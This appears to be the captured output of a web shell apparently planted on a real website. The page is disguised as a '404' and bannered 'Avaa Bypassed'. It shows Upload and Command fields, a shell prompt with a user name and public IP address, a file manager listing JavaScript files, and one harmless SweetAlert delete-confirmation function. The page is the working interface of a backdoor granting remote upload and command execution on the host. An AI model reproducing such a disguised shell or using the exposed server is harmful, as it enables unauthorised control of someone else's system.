404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.16.78.141: ~ $
function confirmBeforeDelete(thisHREF) {
    swal({
        title: "Delete?",
        text: "By doing this, record will be deleted!",
        icon: "warning",
        buttons: ["No", "Yes"],
        dangerMode: true,
    }).then((willDelete) => {
        if (willDelete) {
            location.href = thisHREF.href
        }
    });
    return false;
}

Filemanager

Name Type Size Permission Actions
custom.js File 353 B 0644
facebook.js File 1.61 KB 0644
images.js File 1.61 KB 0644
news_podcasts.js File 2.4 KB 0644
schedule.js File 1.91 KB 0644
users.js File 1.62 KB 0644
userupdate.js File 1.63 KB 0644